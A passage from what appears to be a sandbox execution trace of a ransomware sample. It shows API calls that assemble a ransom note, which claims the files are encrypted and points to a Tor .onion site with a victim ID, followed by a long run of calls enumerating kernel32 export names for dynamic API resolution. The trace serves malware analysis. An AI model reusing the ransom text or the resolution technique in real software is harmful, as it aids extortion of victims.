TOR browser: http://aoacugmutagkwctu.onion/" [0051.682] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/", lpString2="9cda09f29c354b42" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42" [0051.682] lstrlenA (lpString="kernel32.dll") returned 12 [0051.682] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0051.682] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0051.682] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0051.682] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0051.682] lstrlenA (lpString="ADDATOMA") returned 8 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0051.682] lstrlenA (lpString="ADDATOMW") returned 8 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0051.682] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0051.682] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0051.682] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0051.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0051.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0051.682] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0051.683] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0051.683] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0051.683] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0051.683] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0051.683] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0051.683] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0051.683] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0051.683] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0051.683] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0051.683] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0051.683] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0051.683] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0051.683] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0051.683] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0051.683] lstrlenA (lpString="BACKUPREAD") returned 10 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0051.683] lstrlenA (lpString="BACKUPSEEK") returned 10 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0051.683] lstrlenA (lpString="BACKUPWRITE") returned 11 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0051.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0051.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0051.683] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0051.683] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0051.684] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0051.684] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0051.684] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0051.684] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0051.684] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0051.684] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0051.684] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0051.684] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0051.684] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0051.684] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0051.684] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0051.684] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0051.684] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0051.684] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0051.684] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0051.684] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0051.684] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0051.684] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0051.684] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0051.684] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0051.684] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0051.685] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0051.685] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0051.685] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0051.685] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0051.685] lstrlenA (lpString="BEEP") returned 4 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0051.685] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0051.685] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0051.685] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0051.685] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0051.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0051.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0051.685] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0051.685] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0051.685] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0051.685] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0051.685] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0051.685] lstrlenA (lpString="CANCELIO") returned 8 [0051.685] lstrcpyA (in: lpString1=0xc9d428, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0051.685] lstrlenA (lpString="CANCELIOEX") returned 10 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0051.686] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0051.686] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0051.686] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0051.686] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0051.686] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0051.686] lstrlenA (lpString="CHECKELEVATION") returned 14 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0051.686] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0051.686] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0051.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0051.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0051.686] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0051.686] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0051.686] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0051.686] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0051.686] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0051.686] lstrcpyA (in: lpString1=0xc9d428, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0051.687] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0051.687] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0051.687] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0051.687] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0051.687] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0051.687] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0051.687] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0051.687] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0051.687] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0051.687] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0051.687] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0051.687] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0051.687] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0051.687] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0051.687] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0051.687] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0051.687] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0051.687] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0051.687] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0051.687] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0051.688] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0051.688] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0051.688] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0051.688] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0051.688] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0051.688] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0051.688] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0051.688] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0051.688] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0051.688] lstrlenA (lpString="COPYCONTEXT") returned 11 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0051.688] lstrlenA (lpString="COPYFILEA") returned 9 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyFileExA" | 